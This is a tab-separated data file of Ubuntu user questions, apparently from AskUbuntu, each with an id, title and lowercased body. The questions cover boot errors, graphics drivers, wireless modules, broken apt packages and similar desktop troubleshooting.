260649	grub rescue - no such device on boot	i currently have windows 7 - 64bit professional on my pc . i tried to install 12.10 via usb and it worked ok , i partitioned my main c drive and restarted my pc after ubuntu had installed . on boot up i get this error : error : no such device : e80420c6-e74d-4211-8854-3ce6e2f8eb48 . grub rescue > i now can not log onto my pc , any advice would be great .
260651	screen tearing in fluxbox	i using fluxbox as my window manager and i 'm experiencing tearing when viewing videos . tearing does not happen under gnome or unity . i primarily use vlc to play videos in full-screen ( 1920x1080 ) . tearing happens regardless of the player i use , as long as i 'm in fluxbox and full-screen . i have an intel on-board video card . i 've tried following the instructions at screen tearing in 11.10 with intel graphics but it has no effect . my questions are : what is different about how fluxbox handles tearing ? it seems like compiz is n't having any effect -- what setting should i tweak ? what can i do to reduce/remove tearing when viewing videos under fluxbox ?
260655	zsync download problem	when the zsync downloading a file , sometimes the connection may stuck forever and do n't continue for it . although i can cancel it out , and restart the terminal to continue my downloading task . but it 's not a perfect solution for this as it may occur again after approximately 30 minutes . is it a server-side or my connection problem ?
260662	how read documents ( pdf , docx , etc ) using orca in lubuntu 12.10	hello i had installed orca in lubuntu 12.10 . but when i open it i just get the container box with tabs for preferences , help , about , exit . how do i make it read documents ? i want to read a pdf document . is it possible ? someone please help . thanks in advance .
260664	mobile app development issues with qmlviewer not being found ?	i am trying to follow the mobile app development tutorial found here . when i try to run the currency converter in qt creator i get this error : starting external tool '/usr/bin/qmlviewer ' '' qmlviewer : could not exec '/usr/lib/x86_64-linux-gnu/qt5/bin/qmlviewer ' : no such file or directory i 'm not sure how to fix this ? i can run the program from the command line and it runs fine but it does n't work in qt creator . has any one else had these issues ? any advice on how to fix it ?
260666	is there any way that i can make shortcuts from my windows programs in ubuntu ?	i have windows 7 and ubuntu as dual boot , is there any way that i can make a shortcut from one of my existing windows programs , in my `` app draw '' so that i may open it in wine ? i 'm using gnome-shell .
260669	ubuntuone to external drive automatically	so my desktop only has a 40gb hdd so i have a 320gb usb external drive always attached . i want to have ubuntu one sync to my external instead of the internal . i have 67gb of data on my ubuntuone , more than the copacity of my internal . but i ca n't find a way to change where ubuntuone downloads my files to on my machine . can anyone help with this ?
260674	does flash player on google chrome support video acceleration with nvidia drivers ?	does flash player on google chrome ( 11.5 ) support video acceleration with nvidia gpus with the closed source/official drivers from nvidia ?
260680	gnome shell refuses to load on 12.04	gnome shell is n't loading and i ca n't figure out why . according to this snapshot of .xsession-errors , it seems to ( ? ) have something to do with magnifier : ( gnome-shell:2886 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.a11y.magnifier ' does not contain a key named 'invert-lightness' gnome-session [ 2262 ] : warning : application 'gnome-shell.desktop ' killed by signal 5 gnome-session [ 2262 ] : warning : app 'gnome-shell.desktop ' respawning too quickly gnome-session [ 2262 ] : critical : we failed , but the fail whale is dead . sorry ... . now , org.gnome.desktop.a11y.magnifier most definitely does contain invert-lightness because i just added it in both dconf-editor and gconf-editor as false , as suggested here . after a reboot , the message still appears . so , what does this error mean ? is adding invert-lightness not what it 's asking for ?
260682	~/.bashrc not autosourced in 12.04 lts	as this post says , the ~/.bashrc is sourced automatically in ubuntu 12.04 lts server , which i use . i do n't know where he got this information from , but as it is not downvoted yet , i believe it is true . i used this script to check if it is sourced : if [ -f ~/.bashrc ] ; then echo `` not sourced ! `` ; fi just for info : permissions at the moment are 775 and owner is me . so why is my ~/.bashrc not sourced ?
260683	screen goes off while watching a video on youtube	i am using kubuntu 12.10 and have 10 min . screen timeout for reducing the brightness . i just migrated from windows and now i have a problem with `` idle mode '' . i 've also read this and this . but for example , when i am also talking via skype or any video conference software , i have the same problem . i do not want to move my mouse every time since this is annoying . how can i write a script to prevent screen sleeping or dimming if there is a sound , for example ?
260686	why does my shotwell app think it is 2012 ?	as you can see from the screenshot , my shotwell app seems to think that the time and date is back 1 year , in 2012 . i have checked though and my system time/date settings are correct . is there any way that i can change this ? i was hoping to use shotwell to import photos that i take on a regular daily basis that i use for my ebay business , and having them in the correct time and date is very helpful . does anyone have any suggestions ?
260687	apt-get can not install or remove any package	when i try to install ia32-libs in apt gui , it tell me : ruby-vmc : depends : ruby-rubyzip2 ( > = 2.0.1 ) but 2.0.1-0ubuntu4 have installed depends : libhighline-ruby1.9.1 but % s not installed depends : ruby-rest-client ( > = 1.6.1 ) but 1.6.7-1 have installed depends : ruby-terminal-table ( > = 1.4.2 ) but 1.4.2-0ubuntu3 have installed depends : ruby-json-pure ( > = 1.5.1 ) but % s not installed next is the error when i execute : sudo apt-get -f install installarchives ( ) failed : | collecting changes [ 0 ] - stage 1/5 committing to : /etc/ modified vmware/vmnet8/dhcpd/dhcpd.leases | running pre_commit hooks - stage 3/5 committed revision 159 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 491611 files and directories currently installed . ) unpacking ruby-json-pure ( from ... /ruby-json-pure_1.5.1-0ubuntu3_all.deb ) ... dpkg : error processing /var/cache/apt/archives/ruby-json-pure_1.5.1-0ubuntu3_all.deb ( -- unpack ) : trying to overwrite '/usr/lib/ruby/vendor_ruby/json.rb ' , which is also in package ruby-json 1.6.3-1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/ruby-json-pure_1.5.1-0ubuntu3_all.deb dpkg : dependency problems prevent configuration of ruby-vmc : ruby-vmc depends on ruby-json-pure ( > = 1.5.1 ) ; however : package ruby-json-pure is not installed . dpkg : error processing ruby-vmc ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cloudfoundry-client : cloudfoundry-client depends on ruby-vmc ( = 0.3.10-0ubuntu10 ) ; however : package ruby-vmc is not configured yet . dpkg : error processing cloudfoundry-client ( -- configure ) : dependency problems - leaving unconfigured when i execute : sudo apt-get remove ruby-json-pure ruby-json 正在读取软件包列表 ... 完成 正在分析软件包的依赖关系树 正在读取状态信息 ... 完成 **package ruby-json-pure not installed，so it will not be removed** you maybe use “apt-get -f install” to correct this error： unsatisfied dependices： libjson-ruby : depends on : ruby-json but it will not be installed libjson-ruby1.8 : depends on : ruby-json but it will not be installed ruby-vmc : depends on : ruby-json-pure ( > = 1.5.1 ) but it will not be installed e : unsatisfied dependices。please try to execute “apt-get -f install”。 so now i can not remove or install anything . please help to solve this problem step by step , thanks .
260688	software and files to external drive	my os ( ubuntu 12.04 ) is installed on my 40gb internal hdd . i have a 320gb external that stays attached at all times . i would like to have software installed & runnable on the external hdd instead of the internal . i would just install ubuuntu on the internal , but the mother board is unable to boot from anything bigger than a 250gb drive ( i have tried ) . if possible , i would also like my home folder to be located on the external too ( meaning i want saved/downloaded files to go to the external hdd by default rather than having to manually navigate to it ) . when i click the home folder icon on my desktop , i want it to open the external hdd directories . are these things possible ? if so , please give step-by-step instructions . thanks !
260697	hardware installation or mod	if i need to modify a piece of hardware , such as a video card ( failing ) , will ubuntu automatically find and install the drivers for the new card on reboot or will i have to reinstall the os to accommodate the modification ? and yes , i get that ubuntu is `` plug-n-play '' as far as peripherals go ie ; usb , cdrom , printers and such . this involves the main hardware of the pc .
260699	how to install wine on wubi ?	i would like to install wine on my wubi . i am not good with linux as i am a new user of ubuntu i thought my first install will be wubi until i am comfortable with it . now i want to use a windows application on wubi . i read that wine helps in running .exe file on ubuntu but when i try to install on my wubi it says : package dependencies can not be resolved ... .this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . can i get a solution to learn more on this problem ? thank you .
260700	what is the difference installing ubuntu on a galaxy nexus from a mac rather than a ubuntu workstation ?	i am trying to install ubuntu on a galaxy nexus , however the instructions at https : //wiki.ubuntu.com/touch/install look like there is an assumption it is being done from a ubuntu workstation . i am doing this from a macbook pro . i have the adb and fastboot programs . in step 4 it says to run the command phablet-flash -b. i am assuming this is a script which uses fastboot -b < base_addr > to specify a custom kernel base address . what are the actual steps being used here ? am i safe to assume i can accomplish the same thing with the following commands ? fastboot flash bootloader quantal-preinstalled-boot-armel+maguro.img fastboot reboot-bootloader ( wait for fastboot mode to return ) fastboot flash boot ./quantal-preinstalled-armel+maguro/boot.img fastboot reboot-bootloader ( wait for fastboot mode to return ) fastboot flash recovery quantal-preinstalled-recovery-armel+maguro.img fastboot reboot-bootloader ( wait for fastboot mode to return ) fastboot flash system quantal-preinstalled-system-armel+maguro.img fastboot reboot-bootloader
260708	how can i downgrade my nvidia drivers ?	i just installed the nvidia 304.51 and it works great , the problem is that now the unity launcher does n't auto-hide . i found this bug report so it seems there is n't a way to fix it . one way to get auto-hide again it would be to downgrade to the last version of the nvidia drivers ( so it shows in the bug report comments ) , the thing is that i did n't install the drivers using ppa but using this method . any ideas on how i can downgrade my nvidia drivers to `` fix '' this ?
260709	choosing 64 bit ubuntu on universal usb installer	i would like to create an usb live and i have intel processor which supports 64 bit systems but i dont know which version of ubuntu best is for me..actually i have downloaded an ubuntu iso file which is called `` ubuntu-12.04.1-desktop-amd64.iso '' but the word amd in the name made me confused.i dont remember which link i used . i will use universal usb installer so if i choose ubuntu 12.04 desktop , how can i make sure that i am going to download 64 bit version of it ? and i386 means 64 bit ? thanks
260711	how do i log in to 12.04 when after a recent update it no longer recognises my password ?	since carrying out an update yesterday i am now unable to log in . on entering my password the screen goes black momentarily then returns to the log-in screen . if i intentionally enter an incorrect password the text boxes turn red . i can log in normally to a console with ctrl+alt+f1 .
260712	how do i install a proprietary wl broadcom driver ?	i have bcm4313 wi-fi module , which works ok under open-source brcmsmac module , except for numerous disconnects and sudden breakdowns . so i 've downloaded the proprietary tarball , installed it , but ca n't say it made any impact . when i remove all the open-source modules by using rmmod brcmsmac bcma and then plug all the proprietary ones by modprobe lib80211 cfg80211 insmod /lib/modules/my_kernel/drivers/net/wireless/wl.ko nothing happens , i mean my wicd app does n't detect any available connections . i 'm not an expert at linux by any means , so i wonder what might be an adequate solution . ps . dmesg |grep wl output : [ 5801.356381 ] wlan0 : deauthenticating from b8 : a3:86:42:93 : cb by local choice ( reason=3 ) [ 5801.455680 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 5804.419696 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 5804.935700 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 5806.994247 ] wlan0 : authenticate with b8 : a3:86:42:93 : cb [ 5806.994328 ] wlan0 : send auth to b8 : a3:86:42:93 : cb ( try 1/3 ) [ 5806.995904 ] wlan0 : authenticated [ 5806.998173 ] wlan0 : associate with b8 : a3:86:42:93 : cb ( try 1/3 ) [ 5807.001231 ] wlan0 : rx assocresp from b8 : a3:86:42:93 : cb ( capab=0x401 status=0 aid=5 ) [ 5807.001804 ] wlan0 : associated [ 5807.002284 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 5827.490902 ] wlan0 : deauthenticating from b8 : a3:86:42:93 : cb by local choice ( reason=3 ) [ 5827.558074 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 5828.108186 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 5830.138468 ] wlan0 : authenticate with b8 : a3:86:42:93 : cb [ 5830.138583 ] wlan0 : send auth to b8 : a3:86:42:93 : cb ( try 1/3 ) [ 5830.140406 ] wlan0 : authenticated [ 5830.142840 ] wlan0 : associate with b8 : a3:86:42:93 : cb ( try 1/3 ) [ 5830.148274 ] wlan0 : rx assocresp from b8 : a3:86:42:93 : cb ( capab=0x401 status=0 aid=5 ) [ 5830.148856 ] wlan0 : associated [ 5830.150317 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready sudo modprobe wl & dmesg |grep wl : [ 10392.295126 ] wlan0 : deauthenticating from b8 : a3:86:42:93 : cb by local choice ( reason=3 ) [ 10392.392534 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 10392.947547 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 10404.291431 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 10404.933929 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 10406.963425 ] wlan0 : authenticate with b8 : a3:86:42:93 : cb [ 10406.963531 ] wlan0 : send auth to b8 : a3:86:42:93 : cb ( try 1/3 ) [ 10406.965115 ] wlan0 : authenticated [ 10406.967018 ] wlan0 : associate with b8 : a3:86:42:93 : cb ( try 1/3 ) [ 10406.975538 ] wlan0 : rx assocresp from b8 : a3:86:42:93 : cb ( capab=0x401 status=0 aid=3 ) [ 10406.976099 ] wlan0 : associated [ 10406.976817 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 13533.369462 ] wl : module license 'mixed/proprietary ' taints kernel . an ouptut of lsmod | grep -e brcmsmac -e b43 -e bcma while my default module is loaded : brcmsmac 531848 0 mac80211 539908 1 brcmsmac bcma 35656 1 brcmsmac brcmutil 14755 1 brcmsmac cfg80211 206566 2 brcmsmac , mac80211 cordic 12535 1 brcmsmac my connection was working great since the problem i originally adressed was resolved . however , today i 've made a reboot just to find out that my connection does n't work again . first of all , i 've loaded the wl module by using sudo modprobe wl after that checked ifconfig and saw that eth1 inetrface is down and executed sudo ifconfig eth1 up to bring it up shortly afterwards used iwconfig to make sure that eth1 is properly detected in the end typed sudo iwlist eth1 scan to find all the available networks , which worked just as planned however , when i 've finally decided to connect and used for it sudo iwconfig eth1 essid network_name ( no key option here since this it 's not set ) the failure kicked in , since no connection is being established and iwconfig shows that no access point is associated with eth1 interface . i 've read a bunch of manuals but still have no idea what i need to do in order to get my internet back .
260713	enabling tcp md5 signatures in 12.04 ?	after running a nexpose scan of one of my servers , i 'm getting notice that tcp md5 signatures may not be enabled . i 've looked all over the net and from what i can see this feature should be enabled in the most recent kernels , but i still can not figure out a way to confirm . any help would be greatly appreciated .
260718	how `` alongside windows '' option works ?	i have windows 7 . two partition with ntfs , one of them installed with windows 7 . also there 's 100 gb unallocated area in my hard drive . so if i choose `` alongside windows '' is it using my unallocated area or resizing other partitions ? ps : i tried advanced partitioning but windows 7 gave `` efi failure '' on grub . i readed and tried most of solutions but none of them worked . pss : i 'm new on linux .
260725	after install ubuntu 12.10 no icons	im having a problem showing icons on the desktop screen after i installed ubuntu 12.1 . i installed the software on a inspiron 5100 laptop . the unit has windows xp with service pack 3 also installed . the initial install after some difficulties eventually installed , allowing me to set some basic preferences from choices at the top of the screen , such as keyboard , networking etc . it also allows me to log on to the system , however once the desktop attempts to load a pink or orange screen desktop appears there are no options , no icons , just a pretty screen background . the mouse moves but neither right click or left click does anything , although a one time option to download updates was provided and i received them . i am 100 percent new to linux and ubuntu . any help would be greatly appreciated .
260726	how do i remove ubuntu dual-booted with windows 7 ?	i want to uninstall ubuntu 12.10 . i installed ubuntu ( from a usb/cd ) using the option `` install along with windows 7 '' . windows 7 is installed as usual in c : \ and ubuntu is installed in some other drive . how do i uninstall ubuntu from this setup ?
260727	libgl error , unity and compiz not loading on startup	recently when i restarted my dual boot ubuntu ( windows 7 and ubuntu 12.10 ) , all i can see is just my desktop , no dash , no launcher or any topbars . here is the output of usr/lib/nux/unity_support_test -p : libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . opengl vendor string : ati technologies inc. opengl renderer string : ati mobility radeon hd 5000 series opengl version string : 1.4 ( 2.1 ( 4.2.11995 compatibility profile context ) ) not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : no gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no also , when i try to start compiz manually using terminal i get following output : [ vj ] : ~ $ compiz compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . compiz ( core ) - info : starting plugin : opengl libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( expo ) - warn : failed to bind image to texture compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported compiz ( core ) - error : plugin initscreen failed : unityshell compiz ( core ) - error : failed to start plugin : unityshell compiz ( core ) - info : unloading plugin : unityshell x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 18 ( x_changeproperty ) resource id in failed request : 0x2800005 serial number of failed request : 9454 current serial number in output stream : 9457 i 'll be really grateful if someone can help me with this problem .
260734	what does bamfdaemon do ?	i 've googled for it , and there 's very little info besides `` bamf matches application windows to desktop files '' . unity depends on it so it 's difficut to remove , at least would be good to know what it does .
260752	how do i convert videos from my sony hdr xr160 camcorder ?	( translated from german : ) how can we get videos out of a sony hdr cr160 camcorder attached to an usb port ? how do i convert them to a more generally available format ? there is only software for windows or macos available from the manufacturer .
260753	installing using dpkg -i	i was trying to install some aplications after downloading the file x.deb and after doing : sudo dpkg -i x.deb the result is always : processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... anyone knows why ?
260754	securing mini-dlna ?	i 've been trying to setup a dlna service to share my media from my pc to my laptop and occasionally my phone and tablet . after a lot of messing around i found mini-dlna which works well , the problem is , everyone on my network can see my shares and i do n't want this . does anyone have a way of securing it ? i thought maybe using iptables but i do n't have any experience with it and i do n't want to setup a whole load of firewall exceptions for everything that i have running on the pc such as ssh and web servers etc , i 'd want to just restrict dlna access . i use dhcp reservations for my devices . or is dlna the wrong way to do it ? is there a better solution ? i do n't care about windows clients , just linux and android . i want to stream audio and video . also , if dlna is the best way , can anyone recommend a linux client ? i can get clients in android streaming fine , it 's just the security issue , i ca n't find a working client in linux though , vlc does n't work , it sees my server but clicking it , double clicking it , adding to playlist does n't do anything .
260764	can dolphin file manager be downloaded for windows ?	i was on the dolphin website , but there did n't seem to be a download or purchase button anywhere . is dolphin available for windows ? if so , could someone please link me to a page to download or purchase the latest version ?
260766	could not initialize the package information	i have problem opening my update manager . i tried both gui and command line method but found no luck in resolving this issue . with gui update manager says : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' on commandline i get this : avimehenwal @ avimehenwal-dynac : ~ $ sudo apt-get install [ sudo ] password for avimehenwal : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists\in.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages e : the package lists or status file could not be parsed or opened . avimehenwal @ avimehenwal-dynac : ~ $ file mentioned in command line , i am able to open that in gedit editor . kindly help me if anyone knows what the issue and how can i resolve this . even following commands did n't work out sudo apt-get clean sudo apt-get update avimehenwal @ avimehenwal-dynac : ~ $ sudo apt-get clean [ sudo ] password for avimehenwal : avimehenwal @ avimehenwal-dynac : ~ $ sudo apt-get update ign http : //security.ubuntu.com precise-security inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //in.archive.ubuntu.com precise inrelease ign http : //in.archive.ubuntu.com precise-updates inrelease get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:2 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hit http : //security.ubuntu.com precise-security release hit http : //extras.ubuntu.com precise release ign http : //security.ubuntu.com precise-security release ign http : //extras.ubuntu.com precise release get:3 http : //security.ubuntu.com precise-security/main sources [ 63.1 kb ] get:4 http : //extras.ubuntu.com precise/main sources [ 8,130 b ] ign http : //in.archive.ubuntu.com precise-backports inrelease get:5 http : //in.archive.ubuntu.com precise release.gpg [ 198 b ] get:6 http : //in.archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:7 http : //extras.ubuntu.com precise/main i386 packages [ 10.8 kb ] get:8 http : //in.archive.ubuntu.com precise-backports release.gpg [ 198 b ] get:9 http : //security.ubuntu.com precise-security/restricted sources [ 1,950 b ] get:10 http : //security.ubuntu.com precise-security/universe sources [ 22.2 kb ] get:11 http : //security.ubuntu.com precise-security/multiverse sources [ 1,382 b ] get:12 http : //security.ubuntu.com precise-security/main i386 packages [ 237 kb ] hit http : //in.archive.ubuntu.com precise release ign http : //extras.ubuntu.com precise/main translationindex ign http : //in.archive.ubuntu.com precise release hit http : //in.archive.ubuntu.com precise-updates release ign http : //in.archive.ubuntu.com precise-updates release hit http : //in.archive.ubuntu.com precise-backports release get:13 http : //in.archive.ubuntu.com precise/main sources [ 934 kb ] ign http : //in.archive.ubuntu.com precise-backports release get:14 http : //security.ubuntu.com precise-security/restricted i386 packages [ 3,968 b ] get:15 http : //security.ubuntu.com precise-security/universe i386 packages [ 69.9 kb ] get:16 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,368 b ] get:17 http : //security.ubuntu.com precise-security/main translationindex [ 74 b ] get:18 http : //security.ubuntu.com precise-security/multiverse translationindex [ 71 b ] get:19 http : //security.ubuntu.com precise-security/restricted translationindex [ 71 b ] get:20 http : //security.ubuntu.com precise-security/universe translationindex [ 73 b ] get:21 http : //security.ubuntu.com precise-security/main translation-en [ 111 kb ] ign http : //extras.ubuntu.com precise/main translation-en_in ign http : //extras.ubuntu.com precise/main translation-en get:22 http : //security.ubuntu.com precise-security/multiverse translation-en [ 995 b ] get:23 http : //security.ubuntu.com precise-security/restricted translation-en [ 978 b ] get:24 http : //security.ubuntu.com precise-security/universe translation-en [ 43.2 kb ] get:25 http : //in.archive.ubuntu.com precise/restricted sources [ 5,470 b ] ign http : //in.archive.ubuntu.com precise/universe sources/diffindex get:26 http : //in.archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:27 http : //in.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] ign http : //in.archive.ubuntu.com precise/restricted i386 packages/diffindex get:28 http : //in.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:29 http : //in.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] get:30 http : //in.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] get:31 http : //in.archive.ubuntu.com precise/main translationindex [ 3,706 b ] get:32 http : //in.archive.ubuntu.com precise/multiverse translationindex [ 2,676 b ] get:33 http : //in.archive.ubuntu.com precise/restricted translationindex [ 2,596 b ] get:34 http : //in.archive.ubuntu.com precise/universe translationindex [ 2,922 b ] ign http : //in.archive.ubuntu.com precise-updates/main sources/diffindex ign http : //in.archive.ubuntu.com precise-updates/restricted sources/diffindex get:35 http : //in.archive.ubuntu.com precise-updates/universe sources [ 79.2 kb ] ign http : //in.archive.ubuntu.com precise-updates/multiverse sources/diffindex get:36 http : //in.archive.ubuntu.com precise-updates/main i386 packages [ 593 kb ] get:37 http : //in.archive.ubuntu.com precise-updates/restricted i386 packages [ 9,503 b ] get:38 http : //in.archive.ubuntu.com precise-updates/universe i386 packages [ 184 kb ] get:39 http : //in.archive.ubuntu.com precise-updates/universe i386 packages [ 184 kb ] get:40 http : //in.archive.ubuntu.com precise-updates/multiverse i386 packages [ 10.4 kb ] get:41 http : //in.archive.ubuntu.com precise-updates/main translationindex [ 3,564 b ] get:42 http : //in.archive.ubuntu.com precise-updates/multiverse translationindex [ 2,605 b ] get:43 http : //in.archive.ubuntu.com precise-updates/restricted translationindex [ 2,461 b ] get:44 http : //in.archive.ubuntu.com precise-updates/universe translationindex [ 2,850 b ] get:45 http : //in.archive.ubuntu.com precise-backports/main sources [ 2,422 b ] get:46 http : //in.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] ign http : //in.archive.ubuntu.com precise-backports/universe sources/diffindex get:47 http : //in.archive.ubuntu.com precise-backports/multiverse sources [ 2,669 b ] get:48 http : //in.archive.ubuntu.com precise-backports/main i386 packages [ 1,941 b ] get:49 http : //in.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:50 http : //in.archive.ubuntu.com precise-backports/universe i386 packages [ 22.8 kb ] get:51 http : //in.archive.ubuntu.com precise-backports/multiverse i386 packages [ 2,504 b ] get:52 http : //in.archive.ubuntu.com precise-backports/main translationindex [ 72 b ] get:53 http : //in.archive.ubuntu.com precise-backports/multiverse translationindex [ 72 b ] get:54 http : //in.archive.ubuntu.com precise-backports/restricted translationindex [ 70 b ] get:55 http : //in.archive.ubuntu.com precise-backports/universe translationindex [ 73 b ] hit http : //in.archive.ubuntu.com precise/universe sources hit http : //in.archive.ubuntu.com precise/restricted i386 packages get:56 http : //in.archive.ubuntu.com precise/main translation-en [ 726 kb ] get:57 http : //in.archive.ubuntu.com precise/multiverse translation-en [ 93.4 kb ] get:58 http : //in.archive.ubuntu.com precise/restricted translation-en [ 2,395 b ] get:59 http : //in.archive.ubuntu.com precise/universe translation-en [ 3,341 kb ] hit http : //in.archive.ubuntu.com precise-updates/main sources hit http : //in.archive.ubuntu.com precise-updates/restricted sources hit http : //in.archive.ubuntu.com precise-updates/multiverse sources get:60 http : //in.archive.ubuntu.com precise-updates/main translation-en [ 260 kb ] get:61 http : //in.archive.ubuntu.com precise-updates/main translation-en [ 260 kb ] get:62 http : //in.archive.ubuntu.com precise-updates/multiverse translation-en [ 5,694 b ] get:63 http : //in.archive.ubuntu.com precise-updates/restricted translation-en [ 2,328 b ] get:64 http : //in.archive.ubuntu.com precise-updates/universe translation-en [ 108 kb ] hit http : //in.archive.ubuntu.com precise-backports/universe sources get:65 http : //in.archive.ubuntu.com precise-backports/main translation-en [ 1,244 b ] get:66 http : //in.archive.ubuntu.com precise-backports/multiverse translation-en [ 1,476 b ] get:67 http : //in.archive.ubuntu.com precise-backports/restricted translation-en [ 14 b ] get:68 http : //in.archive.ubuntu.com precise-backports/universe translation-en [ 16.0 kb ] fetched 13.3 mb in 8min 41s ( 25.5 kb/s ) reading package lists ... error ! w : gpg error : http : //security.ubuntu.com precise-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //in.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //in.archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //in.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages e : the package lists or status file could not be parsed or opened .
